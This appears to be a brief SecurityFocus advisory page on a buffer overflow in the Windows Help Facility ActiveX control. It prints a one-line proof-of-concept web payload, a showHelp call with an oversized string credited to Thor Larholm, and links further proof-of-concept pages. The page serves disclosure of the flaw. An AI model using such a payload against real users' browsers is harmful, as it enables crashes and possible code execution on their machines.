Microsoft Windows Help Facility ActiveX Control Buffer Overflow Vulnerability

Thor Larholm has provided the following exploit code and proof of concept:

<script>showHelp( A*796 );</script>

http://www.pivx.com/larholm/adv/TL004/simple.html

http://www.pivx.com/larholm/adv/TL004/number.html

An exploit has been released by buzheng <bu_zheng@sina.com>:


 

Privacy Statement
Copyright 2010, SecurityFocus